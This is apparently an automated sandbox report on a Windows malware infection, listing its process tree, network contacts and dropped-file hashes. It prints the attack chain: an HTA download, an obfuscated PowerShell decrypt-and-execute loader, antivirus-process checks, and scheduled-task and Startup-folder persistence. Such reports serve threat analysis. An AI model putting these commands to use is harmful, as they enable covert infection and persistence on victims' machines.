PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://instantinfo.shop/webdav/jreg/CONT

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa428c46f8,0x7ffa428c4708,0x7ffa428c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\CONT.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KdzuM($NJCgwo){return -split ($NJCgwo -replace '..', '0x$& ')};$nJRvzQn = Kdzu…rXNN = [System.Security.Cryptography.Aes]::Create();$IrXNN.Key = KdzuM('5946774947416C527A6278784E4F764C');$IrXNN.IV = New-Object byte[] 16;$eNsiDaGZ = $IrXNN.CreateDecryptor();$qxBtKieQN = $eNsiDaGZ.TransformFinalBlock($nJRvzQn, 0, $nJRvzQn.Length);$OXqabSFMc = [System.Text.Encoding]::Utf8.GetString($qxBtKieQN);$eNsiDaGZ.Dispose();& $OXqabSFMc.Substring(0,3) $OXqabSFMc.Substring(3)

C:\ProgramData\1ASPX.exe

"C:\ProgramData\1ASPX.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5332 /prefetch:2

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\CONT.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KdzuM($NJCgwo){return -split ($NJCgwo -replace '..', '0x$& ')};$nJRvzQn = Kdzu…rXNN = [System.Security.Cryptography.Aes]::Create();$IrXNN.Key = KdzuM('5946774947416C527A6278784E4F764C');$IrXNN.IV = New-Object byte[] 16;$eNsiDaGZ = $IrXNN.CreateDecryptor();$qxBtKieQN = $eNsiDaGZ.TransformFinalBlock($nJRvzQn, 0, $nJRvzQn.Length);$OXqabSFMc = [System.Text.Encoding]::Utf8.GetString($qxBtKieQN);$eNsiDaGZ.Dispose();& $OXqabSFMc.Substring(0,3) $OXqabSFMc.Substring(3)

C:\ProgramData\1ASPX.exe

"C:\ProgramData\1ASPX.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\SearchIndexer.exe

C:\Windows\SysWOW64\SearchIndexer.exe

C:\Windows\SysWOW64\SearchIndexer.exe

C:\Windows\SysWOW64\SearchIndexer.exe

C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe

"C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Pushing Pushing.cmd & Pushing.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 64684

C:\Windows\SysWOW64\findstr.exe

findstr /V "houseslegislationcivilianscientific" Corners

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Refresh + Host + Exists + Homeland + Wayne + Might 64684\x

C:\Users\Admin\AppData\Local\Temp\64684\Run.pif

64684\Run.pif 64684\x

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "Pt" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraSoft Dynamics\DolphinLogix.js'" /sc minute /mo 5 /F

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraSoft Dynamics\DolphinLogix.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url" & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "Pt" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraSoft Dynamics\DolphinLogix.js'" /sc minute /mo 5 /F

C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe

"C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Pushing Pushing.cmd & Pushing.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 64684

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Refresh + Host + Exists + Homeland + Wayne + Might 64684\x

C:\Users\Admin\AppData\Local\Temp\64684\Run.pif

64684\Run.pif 64684\x

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\CONT.hta

Network

Country Destination Domain Proto
US 8.8.8.8:53 instantinfo.shop udp
US 172.67.170.122:443 instantinfo.shop tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 122.170.67.172.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 instantinfo.shop udp
US 172.67.170.122:443 instantinfo.shop tcp
US 8.8.8.8:53 timetablepdodwp.shop udp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 8.8.8.8:53 125.66.21.104.in-addr.arpa udp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 8.8.8.8:53 webtime.site udp
US 172.67.222.142:443 webtime.site tcp
US 8.8.8.8:53 142.222.67.172.in-addr.arpa udp
US 8.8.8.8:53 ieMODxkhNMrCbJWxGjU.ieMODxkhNMrCbJWxGjU udp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 172.67.222.142:443 webtime.site tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 06b496d28461d5c01fc81bc2be6a9978
SHA1 36e7a9d9c7a924d5bb448d68038c7fe5e6cbf5aa
SHA256 e4a2d1395627095b0fa55e977e527ccb5b71dff3cd2d138df498f50f9f5ab507
SHA512 6488a807c978d38d65010583c1e5582548ab8102ebd68ee827e603c9bdfcdbb9f98a488d31414a829409f6edca8bd2eb4aadd4ff31b144de41249fa63a26bc91

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 de1d175f3af722d1feb1c205f4e92d1e
SHA1 019cf8527a9b94bd0b35418bf7be8348be5a1c39
SHA256 1b99cae942ebf99c31795fa279d51b1a2379ca0af7b27bd3c58ea6c78a033924
SHA512 f0dcd08afd3c6a761cc1afa2846ec23fb5438d6127ebd535a754498debabd0b1ebd04858d1b98be92faf14b512f982b1f3dcbb702860e96877eb835f763f9734

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1487d5ab-d45d-4b96-af75-db60de9abe3e.tmp

MD5 50adf9a9563af7fe2e36859c0d45579f
SHA1 105e198e1fbfa7616efe14705c743b5a7f9f6b7f
SHA256 0f65270cc437d3cf7aa30553c4420a4196e27e598459efc6a63731b2118fe8cd
SHA512 dde3f0c7a6ace0a1c4992045265cb046292ea3dfa975e8c7e86ef9d5313c966b9894e447dcdc6cf7da7c2752934144681089bdc2d8933d8418f33d2afcdac715

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\Downloads\CONT

MD5 0b8726a3eebe541ee1ccae02a2cc8811
SHA1 434810b4f6051eb8e0ef2ea034df63e8efa557cc
SHA256 3ac0ec1576eb739f7260eeb594d1a3301779291ab812379868d9acd696684d4d
SHA512 4a9c2dbeb92fab083e7f7ca2dacf55241166f5bfcfb8b84a852a9b2a268224a004aba08d8ecbcf9c77b0b60af2d2747084f3956a9807507076608ec6021bb1c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b1943ab587f3de5e518eaea7a59be248
SHA1 21d4fa394954a0aee8af676934bb8fd794a2babf
SHA256 1bad73c1f85d0de00da236c5ffcf03bbf121309704b4e5ecabd78d117127ab2d
SHA512 fbba80d83a35ecd06076190c13cb20e4ef69b5c5fd6d9a77badfa2c9952d53f499d2e728258522f3e48e9a1bfa4f10726759e52bde239ed940a62da0be735735

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 54ed67d21d655a71358ebc9f94e720c2
SHA1 f942c88ce78341d04980b19e9a1cb1a53ac48400
SHA256 0e62145c029619d04169642343b1cebb8e2a72d18de63928e8b37af1ff73f52e
SHA512 3eb4546e65fd0d63c2454ff61e0cd6348e6b5cec16a4f3698607ed10c510b1e415c062246c9bb7b5b41c3c3bbf559e07bc61ce0b25fde1416227347e08e09cd4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 1b1eefb7f57e4ae86c683e50d58808c1
SHA1 9d143579d41c8ff60afb213a058a2ff0efa9ad78
SHA256 01ffd30b72c8d6e7cefa5de7804a78b7bb3044cced989b5539a4e538a5a0f23c
SHA512 7debf206849035360f34041933b3ffebc750ede25b38e21db684334a7209a8766481b9ff0db264e6b2c3a495aa79558af72e22adef96991fc0260b99216d9b8a

memory/3324-111-0x0000000005170000-0x00000000051A6000-memory.dmp

memory/3324-112-0x0000000005910000-0x0000000005F38000-memory.dmp

memory/3324-113-0x0000000005850000-0x0000000005872000-memory.dmp

memory/3324-114-0x0000000006030000-0x0000000006096000-memory.dmp

memory/3324-115-0x00000000060A0000-0x0000000006106000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y4yubce1.a5l.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3324-125-0x0000000006210000-0x0000000006564000-memory.dmp

memory/3324-126-0x00000000066F0000-0x000000000670E000-memory.dmp

memory/3324-127-0x0000000006740000-0x000000000678C000-memory.dmp

memory/3324-128-0x0000000008060000-0x00000000086DA000-memory.dmp

memory/3324-129-0x0000000006C20000-0x0000000006C3A000-memory.dmp

memory/3324-130-0x00000000079E0000-0x0000000007A76000-memory.dmp

memory/3324-131-0x00000000076F0000-0x0000000007712000-memory.dmp

memory/3324-132-0x00000000086E0000-0x0000000008C84000-memory.dmp

memory/3324-134-0x0000000007EF0000-0x0000000007F22000-memory.dmp

memory/3324-135-0x000000006D020000-0x000000006D06C000-memory.dmp

memory/3324-136-0x000000006D190000-0x000000006D4E4000-memory.dmp

memory/3324-146-0x0000000007ED0000-0x0000000007EEE000-memory.dmp

memory/3324-147-0x0000000007F30000-0x0000000007FD3000-memory.dmp

memory/3324-148-0x0000000008020000-0x000000000802A000-memory.dmp

memory/3324-149-0x0000000009C90000-0x0000000009CA1000-memory.dmp

memory/3324-150-0x0000000009CD0000-0x0000000009CE2000-memory.dmp

memory/3324-151-0x0000000009CC0000-0x0000000009CCA000-memory.dmp

C:\ProgramData\1ASPX.exe

MD5 850a43e323656b86ae665d8b4fd71369
SHA1 099d6e80c394ccc5233e1cbd6b29769da9e0e2aa
SHA256 539423d2e436e198df15b5577d816dc306ba4c03b1362f7731e675b51f4a5f42
SHA512 1f2778040e906ea2939a8b0a682e267599aa8422f81ea83bb6c980a304b569ad750ef3e81e1490edd5b1d74e734a2cb82f428f47096c55436037e03e516d2378

C:\ProgramData\flutter_custom_cursor_plugin.dll

MD5 09518cda3e0d986b81d434e04599bb45
SHA1 a434a37f575928b0f07c65588cafa28970d72234
SHA256 3c0a26c3ca4b75fb1309a4461dd51e190ec6f325f689f5f881d90fa13dfb3d30
SHA512 dbebd11bbeb4f2b6fbfddc7c519805675b3babb6b5a7c1c65e6c5ddac4be18f1599359b712b706059c27e9144183fba0b2418ee672450a8ee5207b65b547369b

C:\ProgramData\desktop_multi_window_plugin.dll

MD5 42c063882fd7cedd3cc62356450d8987
SHA1 a09db77f70a6f7d7c59418fc08250a8e13e8a60d
SHA256 37d1ebfc8f423bf02dec598c6421e4124c8c5666c27782180d84003039e88dff
SHA512 77ac9c670f91059b2caa12da9b5417cd71d525f900b7dda51ffcf499aa2882734b342f6803814c6fde1b527c9742ed9cf67ab1ee8d141cb437b57c979d89b456

C:\ProgramData\flutter_windows.dll

MD5 e3e8d995e4a1d5e84ee11dbd58d21f3b
SHA1 52e7afb03dd3f45f7b8839879fec1acc7965a62e
SHA256 29782ac1f424865fa1007a5f818f35abb5307b01c099aaa38067513e516a0454
SHA512 f4fb26d4dc2d91d36fd8f26b9be6b74f50df94de530afdd8d2d5e9d6d6300b52fb9c6efbd94a95d630094ce59d5d1aa1b898f810be8806b7e9dfc5466d312659

C:\ProgramData\window_size_plugin.dll

MD5 7024d49df9315b5718f40fcd29a8656f
SHA1 ef243d1ec09f2fb714459d596f40a87b5b51c054
SHA256 51877e41297ae94fe33d01d980717ae18938a3e81a32c57adc77d754ef7e66be
SHA512 d9b7661b923b45020641f80a4695079a86f92848a022c8374c9339258a3f63d628000628cf75163b7c707a8506bb4d4928a1ea75e09fa6416eb9a2150eb5b705

C:\ProgramData\window_manager_plugin.dll

MD5 eab165f7a1856fc4fc191416a26f20f3
SHA1 3e3baaa9a8ae20680d4b347a3a65e4a388dc0f4d
SHA256 a2c87dfe4d43c7cc8ac44f2ac43bd45ec4f3f6ba87a2c73ae8b55f26286600e9
SHA512 897e0f107beb1fcc6402183c535f2550e954b379451415e8b40403d0575efa6e1d1373f9f0b9a0649ab09515259490c7bfb9e9926f76735ee513f68460fb5143

C:\ProgramData\aeolotropy.yaml

MD5 17c7c2c9b51a08322c5c94a50e92d81f
SHA1 c6c94230ea0f3d2aa374491856c11d46e8bea555
SHA256 597356a0d11076bb8560d5703e3bc47dcb490ee90b87573c04a3183e5f19f775
SHA512 51e376a573826d35637e8f358beacd2ac28c9443ad586a4e139e172f84539bf26a10934669ba2b1da57793fe6cc70428da85044cfc465583deada2c059a44726

memory/1936-222-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp

C:\ProgramData\importunacy.tiff

MD5 ccd8a59b737b7968e8d4c1ecac083c42
SHA1 af4ca1a6d96bbc087a183898ba1db63bd14a1069
SHA256 09697ae7191dd5d1f431cec653995242330da6655f96bab6e446ebfb8f3d6eb4
SHA512 7aa7c585b9583c90a9518700cd7177fc6644a4f40c7ef360a3d828b0e936892b7fe54f5a4485017994fccb9ea6b869e4d77699df24955af433045fdccf5cfc1e

C:\ProgramData\uni_links_desktop_plugin.dll

MD5 94267176e212b8ebff06728cc6c3f432
SHA1 f65313083c2b3177f405b7ab884ba0a9be3251d9
SHA256 08d08cbfa4d5531ceee16bfcb2255eda79c5b7f7c0894c4e6f49f673457ab362
SHA512 014459c9d3dbe7c09e0d6db085ce9f715248ba6d784845339b2d6896a8ba7b680c93e707d4990350e30c8853a95fd0dc6f8e9244643787db65ab8a2f95c26967

C:\ProgramData\url_launcher_windows_plugin.dll

